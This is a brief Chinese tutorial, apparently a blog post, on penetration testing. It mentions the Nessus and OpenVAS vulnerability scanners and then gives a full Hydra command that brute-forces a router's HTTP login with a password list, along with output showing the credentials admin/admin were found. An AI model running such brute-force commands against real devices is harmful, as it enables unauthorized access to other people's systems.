渗透攻击的思路一般是扫描漏洞,然后利用不同的漏洞,才有针对的渗透攻击。
漏洞扫描的工具有Nessus,该工具可同时在本地或远端遥控,对系统的漏洞分析扫描。Nessus通过新建扫描策略,并添加对应的插件,便可以对系统漏洞进行扫描。
另一个漏洞扫描工具是OpenVAS,在这里不做说明。
上面说明漏洞扫描,下面说下渗透攻击常用的工具Hydra和Medusa。
举个破解路由器登录密码的例子。
root@alexknight:~# hydra -l admin -P /tmp/tt.txt -f -V -e nsr -s 80 -t 1 192.168.1.1 http-get Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only Hydra (http://www.thc.org/thc-hydra) starting at 2015-08-09 22:19:37 [WARNING] You must supply the web page as an additional option or via -m, default path set to / [DATA] 1 task, 1 server, 7 login tries (l:1/p:7), ~7 tries per task [DATA] attacking service http-get on port 80 [ATTEMPT] target 192.168.1.1 - login "admin" - pass "admin" - 1 of 7 [child 0] [80][www] host: 192.168.1.1 login: admin password: admin [STATUS] attack finished for 192.168.1.1 (valid pair found) 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2015-08-09 22:19:38